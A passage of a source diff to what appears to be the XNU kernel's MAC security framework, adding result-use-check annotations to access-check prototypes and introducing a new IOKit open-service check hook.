struct fileglob *fg) __result_use_check; +int mac_file_check_inherit(kauth_cred_t cred, struct 
fileglob *fg) __result_use_check; int mac_file_check_ioctl(kauth_cred_t cred, struct fileglob *fg, - unsigned long cmd); + unsigned long cmd) __result_use_check; int mac_file_check_lock(kauth_cred_t cred, struct fileglob *fg, int op, - struct flock *fl); + struct flock *fl) __result_use_check; int mac_file_check_library_validation(struct proc *proc, struct fileglob *fg, off_t slice_offset, - user_long_t error_message, size_t error_message_size); + user_long_t error_message, size_t error_message_size) __result_use_check; int mac_file_check_mmap(kauth_cred_t cred, struct fileglob *fg, - int prot, int flags, uint64_t file_pos, int *maxprot); + int prot, int flags, uint64_t file_pos, int *maxprot) __result_use_check; void mac_file_check_mmap_downgrade(kauth_cred_t cred, struct fileglob *fg, int *prot); -int mac_file_check_receive(kauth_cred_t cred, struct fileglob *fg); +int mac_file_check_receive(kauth_cred_t cred, struct fileglob *fg) __result_use_check; int mac_file_check_set(kauth_cred_t cred, struct fileglob *fg, - char *bufp, size_t buflen); + char *bufp, size_t buflen) __result_use_check; void mac_file_notify_close(struct ucred *cred, struct fileglob *fg); void mac_file_label_associate(kauth_cred_t cred, struct fileglob *fg); void mac_file_label_destroy(struct fileglob *fg); void mac_file_label_init(struct fileglob *fg); -int mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type); -int mac_iokit_check_set_properties(kauth_cred_t cred, io_object_t registry_entry, io_object_t properties); -int mac_iokit_check_filter_properties(kauth_cred_t cred, io_object_t registry_entry); -int mac_iokit_check_get_property(kauth_cred_t cred, io_object_t registry_entry, const char *name); +int mac_iokit_check_open_service(kauth_cred_t cred, io_object_t service, unsigned int user_client_type) __result_use_check; +int mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type) __result_use_check; +int 
mac_iokit_check_set_properties(kauth_cred_t cred, io_object_t registry_entry, io_object_t properties) __result_use_check; +int mac_iokit_check_filter_properties(kauth_cred_t cred, io_object_t registry_entry) __result_use_check; +int mac_iokit_check_get_property(kauth_cred_t cred, io_object_t registry_entry, const char *name) __result_use_check; #ifdef KERNEL_PRIVATE -int mac_iokit_check_hid_control(kauth_cred_t cred); +int mac_iokit_check_hid_control(kauth_cred_t cred) __result_use_check; #endif int mac_mount_check_fsctl(vfs_context_t ctx, struct mount *mp, - unsigned long cmd); + unsigned long cmd) __result_use_check; int mac_mount_check_getattr(vfs_context_t ctx, struct mount *mp, - struct vfs_attr *vfa); -int mac_mount_check_label_update(vfs_context_t ctx, struct mount *mp); + struct vfs_attr *vfa) __result_use_check; +int mac_mount_check_label_update(vfs_context_t ctx, struct mount *mp) __result_use_check; int mac_mount_check_mount(vfs_context_t ctx, struct vnode *vp, - struct componentname *cnp, const char *vfc_name); -int mac_mount_check_mount_late(vfs_context_t ctx, struct mount *mp); + struct componentname *cnp, const char *vfc_name) __result_use_check; +int mac_mount_check_mount_late(vfs_context_t ctx, struct mount *mp) __result_use_check; int mac_mount_check_snapshot_create(vfs_context_t ctx, struct mount *mp, - const char *name); + const char *name) __result_use_check; int mac_mount_check_snapshot_delete(vfs_context_t ctx, struct mount *mp, - const char *name); + const char *name) __result_use_check; #ifdef KERNEL_PRIVATE int mac_mount_check_snapshot_mount(vfs_context_t ctx, struct vnode *rvp, struct vnode *vp, struct componentname *cnp, const char *name, - const char *vfc_name); + const char *vfc_name) __result_use_check; #endif int mac_mount_check_snapshot_revert(vfs_context_t ctx, struct mount *mp, - const char *name); -int mac_mount_check_remount(vfs_context_t ctx, struct mount *mp); + const char *name) __result_use_check; +int 
mac_mount_check_remount(vfs_context_t ctx, struct mount *mp) __result_use_check; int mac_mount_check_setattr(vfs_context_t ctx, struct mount *mp, - struct vfs_attr *vfa); -int mac_mount_check_stat(vfs_context_t ctx, struct mount *mp); -int mac_mount_check_umount(vfs_context_t ctx, struct mount *mp); + struct vfs_attr *vfa) __result_use_check; +int mac_mount_check_stat(vfs_context_t ctx, struct mount *mp) __result_use_check; +int mac_mount_check_umount(vfs_context_t ctx, struct mount *mp) __result_use_check; void mac_mount_label_associate(vfs_context_t ctx, struct mount *mp); void mac_mount_label_destroy(struct mount *mp); int mac_mount_label_externalize(struct label *label, char *elements, - char *outbuf, size_t outbuflen); -int mac_mount_label_get(struct mount *mp, user_addr_t mac_p); + char *outbuf, size_t outbuflen) __result_use_check; +int mac_mount_label_get(struct mount *mp, user_addr_t mac_p) __result_use_check; void mac_mount_label_init(struct mount *); -int mac_mount_label_internalize(struct label *, char *string); +int mac_mount_label_internalize(struct label *, char *string) __result_use_check; int mac_pipe_check_ioctl(kauth_cred_t cred, struct pipe *cpipe, - unsigned long cmd); + unsigned long cmd) __result_use_check; int mac_pipe_check_kqfilter(kauth_cred_t cred, struct knote *kn, - struct pipe *cpipe); -int mac_pipe_check_read(kauth_cred_t cred, struct pipe *cpipe); + struct pipe *cpipe) __result_use_check; +int mac_pipe_check_read(kauth_cred_t cred, struct pipe *cpipe) __result_use_check; int mac_pipe_check_select(kauth_cred_t cred, struct pipe *cpipe, - int which); -int mac_pipe_check_stat(kauth_cred_t cred, struct pipe *cpipe); -int mac_pipe_check_write(kauth_cred_t cred, struct pipe *cpipe); + int which) __result_use_check; +int mac_pipe_check_stat(kauth_cred_t cred, struct pipe *cpipe) __result_use_check; +int mac_pipe_check_write(kauth_cred_t cred, struct pipe *cpipe) __result_use_check; struct label *mac_pipe_label_alloc(void); void 
mac_pipe_label_associate(kauth_cred_t cred, struct pipe *cpipe); void mac_pipe_label_destroy(struct pipe *cpipe); void mac_pipe_label_free(struct label *label); void mac_pipe_label_init(struct pipe *cpipe); void mac_policy_initbsd(void); -int mac_posixsem_check_create(kauth_cred_t cred, const char *name); -int mac_posixsem_check_open(kauth_cred_t cred, struct pseminfo *psem); -int mac_posixsem_check_post(kauth_cred_t cred, struct pseminfo *psem); +int mac_posixsem_check_create(kauth_cred_t cred, const char *name) __result_use_check; +int mac_posixsem_check_open(kauth_cred_t cred, struct pseminfo *psem) __result_use_check; +int mac_posixsem_check_post(kauth_cred_t cred, struct pseminfo *psem) __result_use_check; int mac_posixsem_check_unlink(kauth_cred_t cred, struct pseminfo *psem, - const char *name); -int mac_posixsem_check_wait(kauth_cred_t cred, struct pseminfo *psem); + const char *name) __result_use_check; +int mac_posixsem_check_wait(kauth_cred_t cred, struct pseminfo *psem) __result_use_check; void mac_posixsem_vnode_label_associate(kauth_cred_t cred, struct pseminfo *psem, struct label *plabel, vnode_t vp, struct label *vlabel); @@ -271,16 +274,16 @@ void mac_posixsem_label_associate(kauth_cred_t cred, struct pseminfo *psem, const char *name); void mac_posixsem_label_destroy(struct pseminfo *psem); void mac_posixsem_label_init(struct pseminfo *psem); -int mac_posixshm_check_create(kauth_cred_t cred, const char *name); +int mac_posixshm_check_create(kauth_cred_t cred, const char *name) __result_use_check; int mac_posixshm_check_mmap(kauth_cred_t cred, struct pshminfo *pshm, - int prot, int flags); + int prot, int flags) __result_use_check; int mac_posixshm_check_open(kauth_cred_t cred, struct pshminfo *pshm, - int fflags); -int mac_posixshm_check_stat(kauth_cred_t cred, struct pshminfo *pshm); + int fflags) __result_use_check; +int mac_posixshm_check_stat(kauth_cred_t cred, struct pshminfo *pshm) __result_use_check; int 
mac_posixshm_check_truncate(kauth_cred_t cred, struct pshminfo *pshm, - off_t s); + off_t s) __result_use_check; int mac_posixshm_check_unlink(kauth_cred_t cred, struct pshminfo *pshm, - const char *name); + const char *name) __result_use_check; void mac_posixshm_vnode_label_associate(kauth_cred_t cred, struct pshminfo *pshm, struct label *plabel, vnode_t vp, struct label *vlabel); @@ -288,233 +291,234 @@ void mac_posixshm_label_associate(kauth_cred_t cred, struct pshminfo *pshm, const char *name); void mac_posixshm_label_destroy(struct pshminfo *pshm); void mac_posixshm_label_init(struct pshminfo *pshm); -int mac_priv_check(kauth_cred_t cred, int priv); -int mac_priv_grant(kauth_cred_t cred, int priv); -int mac_proc_check_debug(proc_ident_t tracing_ident, kauth_cred_t tracing_cred, proc_ident_t traced_ident); -int mac_proc_check_dump_core(proc_t proc); -int mac_proc_check_proc_info(proc_t curp, proc_t target, int callnum, int flavor); -int mac_proc_check_get_cs_info(proc_t curp, proc_t target, unsigned int op); -int mac_proc_check_set_cs_info(proc_t curp, proc_t target, unsigned int op); -int mac_proc_check_fork(proc_t proc); -int mac_proc_check_suspend_resume(proc_t proc, int sr); -int mac_proc_check_get_task_name(kauth_cred_t cred, proc_ident_t pident); -int mac_proc_check_get_task(kauth_cred_t cred, proc_ident_t pident); -int mac_proc_check_expose_task(kauth_cred_t cred, proc_ident_t pident); -int mac_proc_check_inherit_ipc_ports(struct proc *p, struct vnode *cur_vp, off_t cur_offset, struct vnode *img_vp, off_t img_offset, struct vnode *scriptvp); -int mac_proc_check_getaudit(proc_t proc); -int mac_proc_check_getauid(proc_t proc); +int mac_priv_check(kauth_cred_t cred, int priv) __result_use_check; +int mac_priv_grant(kauth_cred_t cred, int priv) __result_use_check; +int mac_proc_check_debug(proc_ident_t tracing_ident, kauth_cred_t tracing_cred, proc_ident_t traced_ident) __result_use_check; +int mac_proc_check_dump_core(proc_t proc) __result_use_check; +int 
mac_proc_check_proc_info(proc_t curp, proc_t target, int callnum, int flavor) __result_use_check; +int mac_proc_check_get_cs_info(proc_t curp, proc_t target, unsigned int op) __result_use_check; +int mac_proc_check_set_cs_info(proc_t curp, proc_t target, unsigned int op) __result_use_check; +int mac_proc_check_fork(proc_t proc) __result_use_check; +int mac_proc_check_suspend_resume(proc_t proc, int sr) __result_use_check; +int mac_proc_check_get_task(kauth_cred_t cred, proc_ident_t pident, mach_task_flavor_t flavor) __result_use_check; +int mac_proc_check_expose_task(kauth_cred_t cred, proc_ident_t pident, mach_task_flavor_t flavor) __result_use_check; +int mac_proc_check_get_movable_control_port(void) __result_use_check; +int mac_proc_check_inherit_ipc_ports(struct proc *p, struct vnode *cur_vp, off_t cur_offset, struct vnode *img_vp, off_t img_offset, struct vnode *scriptvp) __result_use_check; +int mac_proc_check_getaudit(proc_t proc) __result_use_check; +int mac_proc_check_getauid(proc_t proc) __result_use_check; int mac_proc_check_getlcid(proc_t proc1, proc_t proc2, - pid_t pid); -int mac_proc_check_ledger(proc_t curp, proc_t target, int op); + pid_t pid) __result_use_check; +int mac_proc_check_dyld_process_info_notify_register(void) __result_use_check; +int mac_proc_check_ledger(proc_t curp, proc_t target, int op) __result_use_check; int mac_proc_check_map_anon(proc_t proc, user_addr_t u_addr, - user_size_t u_size, int prot, int flags, int *maxprot); + user_size_t u_size, int prot, int flags, int *maxprot) __result_use_check; int mac_proc_check_mprotect(proc_t proc, - user_addr_t addr, user_size_t size, int prot); -int mac_proc_check_run_cs_invalid(proc_t proc); + user_addr_t addr, user_size_t size, int prot) __result_use_check; +int mac_proc_check_run_cs_invalid(proc_t proc) __result_use_check; void mac_proc_notify_cs_invalidated(proc_t proc); -int mac_proc_check_sched(proc_t proc, proc_t proc2); -int mac_proc_check_setaudit(proc_t proc, struct 
auditinfo_addr *ai); -int mac_proc_check_setauid(proc_t proc, uid_t auid); +int mac_proc_check_sched(proc_t proc, proc_t proc2) __result_use_check; +int mac_proc_check_setaudit(proc_t proc, struct auditinfo_addr *ai) __result_use_check; +int mac_proc_check_setauid(proc_t proc, uid_t auid) __result_use_check; int mac_proc_check_setlcid(proc_t proc1, proc_t proc2, - pid_t pid1, pid_t pid2); + pid_t pid1, pid_t pid2) __result_use_check; int mac_proc_check_signal(proc_t proc1, proc_t proc2, - int signum); -int mac_proc_check_syscall_unix(proc_t proc, int scnum); -int mac_proc_check_wait(proc_t proc1, proc_t proc2); + int signum) __result_use_check; +int mac_proc_check_syscall_unix(proc_t proc, int scnum) __result_use_check; +int mac_proc_check_wait(proc_t proc1, proc_t proc2) __result_use_check; void mac_proc_notify_exit(proc_t proc); -int mac_socket_check_accept(kauth_cred_t cred, struct socket *so); -int mac_socket_check_accepted(kauth_cred_t cred, struct socket *so); +int mac_socket_check_accept(kauth_cred_t cred, struct socket *so) __result_use_check; +int mac_socket_check_accepted(kauth_cred_t cred, struct socket *so) __result_use_check; int mac_socket_check_bind(kauth_cred_t cred, struct socket *so, - struct sockaddr *addr); + struct sockaddr *addr) __result_use_check; int mac_socket_check_connect(kauth_cred_t cred, struct socket *so, - struct sockaddr *addr); + struct sockaddr *addr) __result_use_check; int mac_socket_check_create(kauth_cred_t cred, int domain, - int type, int protocol); + int type, int protocol) __result_use_check; int mac_socket_check_ioctl(kauth_cred_t cred, struct socket *so, - unsigned long cmd); -int mac_socket_check_listen(kauth_cred_t cred, struct socket *so); -int mac_socket_check_receive(kauth_cred_t cred, struct socket *so); + unsigned long cmd) __result_use_check; +int mac_socket_check_listen(kauth_cred_t cred, struct socket *so) __result_use_check; +int mac_socket_check_receive(kauth_cred_t cred, struct socket *so) 
__result_use_check; int mac_socket_check_received(kauth_cred_t cred, struct socket *so, - struct sockaddr *saddr); + struct sockaddr *saddr) __result_use_check; int mac_socket_check_send(kauth_cred_t cred, struct socket *so, - struct sockaddr *addr); + struct sockaddr *addr) __result_use_check; int mac_socket_check_getsockopt(kauth_cred_t cred, struct socket *so, - struct sockopt *sopt); + struct sockopt *sopt) __result_use_check; int mac_socket_check_setsockopt(kauth_cred_t cred, struct socket *so, - struct sockopt *sopt); -int mac_socket_check_stat(kauth_cred_t cred, struct socket *so); + struct sockopt *sopt) __result_use_check; +int mac_socket_check_stat(kauth_cred_t cred, struct socket *so) __result_use_check; void mac_socket_label_associate(kauth_cred_t cred, struct socket *so); void mac_socket_label_associate_accept(struct socket *oldsocket, struct socket *newsocket); void mac_socket_label_copy(struct label *from, struct label *to); void mac_socket_label_destroy(struct socket *); int mac_socket_label_get(kauth_cred_t cred, struct socket *so, - struct mac *extmac); -int mac_socket_label_init(struct socket *, int waitok); + struct mac *extmac) __result_use_check; +int mac_socket_label_init(struct socket *, int waitok) __result_use_check; void mac_socketpeer_label_associate_socket(struct socket *peersocket, struct socket *socket_to_modify); int mac_socketpeer_label_get(kauth_cred_t cred, struct socket *so, - struct mac *extmac); -int mac_system_check_acct(kauth_cred_t cred, struct vnode *vp); -int mac_system_check_audit(kauth_cred_t cred, void *record, int length); -int mac_system_check_auditctl(kauth_cred_t cred, struct vnode *vp); -int mac_system_check_auditon(kauth_cred_t cred, int cmd); -int mac_system_check_host_priv(kauth_cred_t cred); -int mac_system_check_info(kauth_cred_t, const char *info_type); -int mac_system_check_nfsd(kauth_cred_t cred); -int mac_system_check_reboot(kauth_cred_t cred, int howto); -int mac_system_check_settime(kauth_cred_t cred); 
-int mac_system_check_swapoff(kauth_cred_t cred, struct vnode *vp); -int mac_system_check_swapon(kauth_cred_t cred, struct vnode *vp); + struct mac *extmac) __result_use_check; +int mac_system_check_acct(kauth_cred_t cred, struct vnode *vp) __result_use_check; +int mac_system_check_audit(kauth_cred_t cred, void *record, int length) __result_use_check; +int mac_system_check_auditctl(kauth_cred_t cred, struct vnode *vp) __result_use_check; +int mac_system_check_auditon(kauth_cred_t cred, int cmd) __result_use_check; +int mac_system_check_host_priv(kauth_cred_t cred) __result_use_check; +int mac_system_check_info(kauth_cred_t, const char *info_type) __result_use_check; +int mac_system_check_nfsd(kauth_cred_t cred) __result_use_check; +int mac_system_check_reboot(kauth_cred_t cred, int howto) __result_use_check; +int mac_system_check_settime(kauth_cred_t cred) __result_use_check; +int mac_system_check_swapoff(kauth_cred_t cred, struct vnode *vp) __result_use_check; +int mac_system_check_swapon(kauth_cred_t cred, struct vnode *vp) __result_use_check; int mac_system_check_sysctlbyname(kauth_cred_t cred, const char *namestring, int *name, size_t namelen, user_addr_t oldctl, size_t oldlen, - user_addr_t newctl, size_t newlen); -int mac_system_check_kas_info(kauth_cred_t cred, int selector); + user_addr_t newctl, size_t newlen) __result_use_check; +int mac_system_check_kas_info(kauth_cred_t cred, int selector) __result_use_check; void mac_sysvmsg_label_associate(kauth_cred_t cred, struct msqid_kernel *msqptr, struct msg *msgptr); void mac_sysvmsg_label_init(struct msg *msgptr); void mac_sysvmsg_label_recycle(struct msg *msgptr); int mac_sysvmsq_check_enqueue(kauth_cred_t cred, struct msg *msgptr, - struct msqid_kernel *msqptr); -int mac_sysvmsq_check_msgrcv(kauth_cred_t cred, struct msg *msgptr); -int mac_sysvmsq_check_msgrmid(kauth_cred_t cred, struct msg *msgptr); + struct msqid_kernel *msqptr) __result_use_check; +int mac_sysvmsq_check_msgrcv(kauth_cred_t cred, struct 
msg *msgptr) __result_use_check; +int mac_sysvmsq_check_msgrmid(kauth_cred_t cred, struct msg *msgptr) __result_use_check; int mac_sysvmsq_check_msqctl(kauth_cred_t cred, - struct msqid_kernel *msqptr, int cmd); + struct msqid_kernel *msqptr, int cmd) __result_use_check; int mac_sysvmsq_check_msqget(kauth_cred_t cred, - struct msqid_kernel *msqptr); + struct msqid_kernel *msqptr) __result_use_check; int mac_sysvmsq_check_msqrcv(kauth_cred_t cred, - struct msqid_kernel *msqptr); + struct msqid_kernel *msqptr) __result_use_check; int mac_sysvmsq_check_msqsnd(kauth_cred_t cred, - struct msqid_kernel *msqptr); + struct msqid_kernel *msqptr) __result_use_check; void mac_sysvmsq_label_associate(kauth_cred_t cred, struct msqid_kernel *msqptr); void mac_sysvmsq_label_init(struct msqid_kernel *msqptr); void mac_sysvmsq_label_recycle(struct msqid_kernel *msqptr); int mac_sysvsem_check_semctl(kauth_cred_t cred, - struct semid_kernel *semakptr, int cmd); + struct semid_kernel *semakptr, int cmd) __result_use_check; int mac_sysvsem_check_semget(kauth_cred_t cred, - struct semid_kernel *semakptr); + struct semid_kernel *semakptr) __result_use_check; int mac_sysvsem_check_semop(kauth_cred_t cred, - struct semid_kernel *semakptr, size_t accesstype); + struct semid_kernel *semakptr, size_t accesstype) __result_use_check; void mac_sysvsem_label_associate(kauth_cred_t cred, struct semid_kernel *semakptr); void mac_sysvsem_label_destroy(struct semid_kernel *semakptr); void mac_sysvsem_label_init(struct semid_kernel *semakptr); void mac_sysvsem_label_recycle(struct semid_kernel *semakptr); int mac_sysvshm_check_shmat(kauth_cred_t cred, - struct shmid_kernel *shmsegptr, int shmflg); + struct shmid_kernel *shmsegptr, int shmflg) __result_use_check; int mac_sysvshm_check_shmctl(kauth_cred_t cred, - struct shmid_kernel *shmsegptr, int cmd); + struct shmid_kernel *shmsegptr, int cmd) __result_use_check; int mac_sysvshm_check_shmdt(kauth_cred_t cred, - struct shmid_kernel *shmsegptr); + 
struct shmid_kernel *shmsegptr) __result_use_check; int mac_sysvshm_check_shmget(kauth_cred_t cred, - struct shmid_kernel *shmsegptr, int shmflg); + struct shmid_kernel *shmsegptr, int shmflg) __result_use_check; void mac_sysvshm_label_associate(kauth_cred_t cred, struct shmid_kernel *shmsegptr); void mac_sysvshm_label_destroy(struct shmid_kernel *shmsegptr); void mac_sysvshm_label_init(struct shmid_kernel* shmsegptr); void mac_sysvshm_label_recycle(struct shmid_kernel *shmsegptr); int mac_vnode_check_access(vfs_context_t ctx, struct vnode *vp, - int acc_mode); -int mac_vnode_check_chdir(vfs_context_t ctx, struct vnode *dvp); + int acc_mode) __result_use_check; +int mac_vnode_check_chdir(vfs_context_t ctx, struct vnode *dvp) __result_use_check; int mac_vnode_check_chroot(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp); + struct componentname *cnp) __result_use_check; int mac_vnode_check_clone(vfs_context_t ctx, struct vnode *dvp, - struct vnode *vp, struct componentname *cnp); + struct vnode *vp, struct componentname *cnp) __result_use_check; int mac_vnode_check_create(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp, struct vnode_attr *vap); + struct componentname *cnp, struct vnode_attr *vap) __result_use_check; int mac_vnode_check_deleteextattr(vfs_context_t ctx, struct vnode *vp, - const char *name); + const char *name) __result_use_check; int mac_vnode_check_exchangedata(vfs_context_t ctx, struct vnode *v1, - struct vnode *v2); + struct vnode *v2) __result_use_check; int mac_vnode_check_exec(vfs_context_t ctx, struct vnode *vp, - struct image_params *imgp); -int mac_vnode_check_fsgetpath(vfs_context_t ctx, struct vnode *vp); + struct image_params *imgp) __result_use_check; +int mac_vnode_check_fsgetpath(vfs_context_t ctx, struct vnode *vp) __result_use_check; int mac_vnode_check_getattr(vfs_context_t ctx, struct ucred *file_cred, - struct vnode *vp, struct vnode_attr *va); + struct vnode *vp, struct vnode_attr *va) 
__result_use_check; int mac_vnode_check_getattrlist(vfs_context_t ctx, struct vnode *vp, - struct attrlist *alist); + struct attrlist *alist) __result_use_check; int mac_vnode_check_getextattr(vfs_context_t ctx, struct vnode *vp, - const char *name, struct uio *uio); + const char *name, struct uio *uio) __result_use_check; int mac_vnode_check_ioctl(vfs_context_t ctx, struct vnode *vp, - unsigned long cmd); + unsigned long cmd) __result_use_check; int mac_vnode_check_kqfilter(vfs_context_t ctx, - kauth_cred_t file_cred, struct knote *kn, struct vnode *vp); + kauth_cred_t file_cred, struct knote *kn, struct vnode *vp) __result_use_check; int mac_vnode_check_label_update(vfs_context_t ctx, struct vnode *vp, - struct label *newlabel); + struct label *newlabel) __result_use_check; int mac_vnode_check_link(vfs_context_t ctx, struct vnode *dvp, - struct vnode *vp, struct componentname *cnp); -int mac_vnode_check_listextattr(vfs_context_t ctx, struct vnode *vp); + struct vnode *vp, struct componentname *cnp) __result_use_check; +int mac_vnode_check_listextattr(vfs_context_t ctx, struct vnode *vp) __result_use_check; int mac_vnode_check_lookup(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp); + struct componentname *cnp) __result_use_check; int mac_vnode_check_lookup_preflight(vfs_context_t ctx, struct vnode *dvp, - const char *path, size_t pathlen); + const char *path, size_t pathlen) __result_use_check; int mac_vnode_check_open(vfs_context_t ctx, struct vnode *vp, - int acc_mode); + int acc_mode) __result_use_check; int mac_vnode_check_read(vfs_context_t ctx, - kauth_cred_t file_cred, struct vnode *vp); -int mac_vnode_check_readdir(vfs_context_t ctx, struct vnode *vp); -int mac_vnode_check_readlink(vfs_context_t ctx, struct vnode *vp); + kauth_cred_t file_cred, struct vnode *vp) __result_use_check; +int mac_vnode_check_readdir(vfs_context_t ctx, struct vnode *vp) __result_use_check; +int mac_vnode_check_readlink(vfs_context_t ctx, struct vnode *vp) 
__result_use_check; int mac_vnode_check_rename(vfs_context_t ctx, struct vnode *dvp, struct vnode *vp, struct componentname *cnp, struct vnode *tdvp, - struct vnode *tvp, struct componentname *tcnp); -int mac_vnode_check_revoke(vfs_context_t ctx, struct vnode *vp); + struct vnode *tvp, struct componentname *tcnp) __result_use_check; +int mac_vnode_check_revoke(vfs_context_t ctx, struct vnode *vp) __result_use_check; int mac_vnode_check_searchfs(vfs_context_t ctx, struct vnode *vp, - struct attrlist *alist); + struct attrlist *alist) __result_use_check; int mac_vnode_check_select(vfs_context_t ctx, struct vnode *vp, - int which); + int which) __result_use_check; int mac_vnode_check_setacl(vfs_context_t ctx, struct vnode *vp, - struct kauth_acl *acl); + struct kauth_acl *acl) __result_use_check; int mac_vnode_check_setattrlist(vfs_context_t ctxd, struct vnode *vp, - struct attrlist *alist); + struct attrlist *alist) __result_use_check; int mac_vnode_check_setextattr(vfs_context_t ctx, struct vnode *vp, - const char *name, struct uio *uio); + const char *name, struct uio *uio) __result_use_check; int mac_vnode_check_setflags(vfs_context_t ctx, struct vnode *vp, - u_long flags); + u_long flags) __result_use_check; int mac_vnode_check_setmode(vfs_context_t ctx, struct vnode *vp, - mode_t mode); + mode_t mode) __result_use_check; int mac_vnode_check_setowner(vfs_context_t ctx, struct vnode *vp, - uid_t uid, gid_t gid); + uid_t uid, gid_t gid) __result_use_check; int mac_vnode_check_setutimes(vfs_context_t ctx, struct vnode *vp, - struct timespec atime, struct timespec mtime); + struct timespec atime, struct timespec mtime) __result_use_check; int mac_vnode_check_signature(struct vnode *vp, struct cs_blob *cs_blob, struct image_params *imgp, unsigned int *cs_flags, unsigned int *signer_type, - int flags, unsigned int platform); + int flags, unsigned int platform) __result_use_check; int mac_vnode_check_supplemental_signature(struct vnode *vp, struct cs_blob *cs_blob, 
struct vnode *linked_vp, - struct cs_blob *linked_cs_blob, unsigned int *signer_type); + struct cs_blob *linked_cs_blob, unsigned int *signer_type) __result_use_check; int mac_vnode_check_stat(vfs_context_t ctx, - kauth_cred_t file_cred, struct vnode *vp); + kauth_cred_t file_cred, struct vnode *vp) __result_use_check; #ifdef KERNEL_PRIVATE int mac_vnode_check_trigger_resolve(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp); + struct componentname *cnp) __result_use_check; #endif int mac_vnode_check_truncate(vfs_context_t ctx, - kauth_cred_t file_cred, struct vnode *vp); + kauth_cred_t file_cred, struct vnode *vp) __result_use_check; int mac_vnode_check_uipc_bind(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp, struct vnode_attr *vap); -int mac_vnode_check_uipc_connect(vfs_context_t ctx, struct vnode *vp, struct socket *so); + struct componentname *cnp, struct vnode_attr *vap) __result_use_check; +int mac_vnode_check_uipc_connect(vfs_context_t ctx, struct vnode *vp, struct socket *so) __result_use_check; int mac_vnode_check_unlink(vfs_context_t ctx, struct vnode *dvp, - struct vnode *vp, struct componentname *cnp); + struct vnode *vp, struct componentname *cnp) __result_use_check; int mac_vnode_check_write(vfs_context_t ctx, - kauth_cred_t file_cred, struct vnode *vp); + kauth_cred_t file_cred, struct vnode *vp) __result_use_check; struct label *mac_vnode_label_alloc(void); int mac_vnode_label_associate(struct mount *mp, struct vnode *vp, - vfs_context_t ctx); + vfs_context_t ctx) __result_use_check; void mac_vnode_label_associate_devfs(struct mount *mp, struct devnode *de, struct vnode *vp); -int mac_vnode_label_associate_extattr(struct mount *mp, struct vnode *vp); +int mac_vnode_label_associate_extattr(struct mount *mp, struct vnode *vp) __result_use_check; int mac_vnode_label_associate_fdesc(struct mount *mp, struct fdescnode *fnp, - struct vnode *vp, vfs_context_t ctx); + struct vnode *vp, vfs_context_t ctx) 
__result_use_check; void mac_vnode_label_associate_singlelabel(struct mount *mp, struct vnode *vp); void mac_vnode_label_copy(struct label *l1, struct label *l2); void mac_vnode_label_destroy(struct vnode *vp); -int mac_vnode_label_externalize_audit(struct vnode *vp, struct mac *mac); +int mac_vnode_label_externalize_audit(struct vnode *vp, struct mac *mac) __result_use_check; void mac_vnode_label_free(struct label *label); void mac_vnode_label_init(struct vnode *vp); -int mac_vnode_label_init_needed(struct vnode *vp); +int mac_vnode_label_init_needed(struct vnode *vp) __result_use_check; #ifdef KERNEL_PRIVATE struct label *mac_vnode_label_allocate(vnode_t vp); #endif @@ -524,7 +528,7 @@ void mac_vnode_label_update(vfs_context_t ctx, struct vnode *vp, void mac_vnode_label_update_extattr(struct mount *mp, struct vnode *vp, const char *name); int mac_vnode_notify_create(vfs_context_t ctx, struct mount *mp, - struct vnode *dvp, struct vnode *vp, struct componentname *cnp); + struct vnode *dvp, struct vnode *vp, struct componentname *cnp) __result_use_check; void mac_vnode_notify_deleteextattr(vfs_context_t ctx, struct vnode *vp, const char *name); void mac_vnode_notify_link(vfs_context_t ctx, struct vnode *vp, struct vnode *dvp, struct componentname *cnp); @@ -539,17 +543,17 @@ void mac_vnode_notify_setmode(vfs_context_t ctx, struct vnode *vp, mode_t mod void mac_vnode_notify_setowner(vfs_context_t ctx, struct vnode *vp, uid_t uid, gid_t gid); void mac_vnode_notify_setutimes(vfs_context_t ctx, struct vnode *vp, struct timespec atime, struct timespec mtime); void mac_vnode_notify_truncate(vfs_context_t ctx, kauth_cred_t file_cred, struct vnode *vp); -int mac_vnode_find_sigs(struct proc *p, struct vnode *vp, off_t offsetInMacho); +int mac_vnode_find_sigs(struct proc *p, struct vnode *vp, off_t offsetInMacho) __result_use_check; int vnode_label(struct mount *mp, struct vnode *dvp, struct vnode *vp, - struct componentname *cnp, int flags, vfs_context_t ctx); + struct 
componentname *cnp, int flags, vfs_context_t ctx) __result_use_check; void vnode_relabel(struct vnode *vp); void mac_pty_notify_grant(proc_t p, struct tty *tp, dev_t dev, struct label *label); void mac_pty_notify_close(proc_t p, struct tty *tp, dev_t dev, struct label *label); -int mac_kext_check_load(kauth_cred_t cred, const char *identifier); -int mac_kext_check_unload(kauth_cred_t cred, const char *identifier); -int mac_kext_check_query(kauth_cred_t cred); -int mac_skywalk_flow_check_connect(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol); -int mac_skywalk_flow_check_listen(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol); +int mac_kext_check_load(kauth_cred_t cred, const char *identifier) __result_use_check; +int mac_kext_check_unload(kauth_cred_t cred, const char *identifier) __result_use_check; +int mac_kext_check_query(kauth_cred_t cred) __result_use_check; +int mac_skywalk_flow_check_connect(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol) __result_use_check; +int mac_skywalk_flow_check_listen(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol) __result_use_check; void mac_vnode_notify_reclaim(vnode_t vp); void psem_label_associate(struct fileproc *fp, struct vnode *vp, struct vfs_context *ctx); diff --git a/security/mac_iokit.c b/security/mac_iokit.c index fe1f43ac0..a6946e80b 100644 --- a/security/mac_iokit.c +++ b/security/mac_iokit.c @@ -64,6 +64,15 @@ #include #include +int +mac_iokit_check_open_service(kauth_cred_t cred, io_object_t service, unsigned int user_client_type) +{ + int error; + + MAC_CHECK(iokit_check_open_service, cred, service, user_client_type); + return error; +} + int mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type) { diff --git a/security/mac_mach.c b/security/mac_mach.c index 4739336fb..a1bb852f3 100644 --- a/security/mac_mach.c +++ b/security/mac_mach.c @@ -75,10 +75,12 @@ 
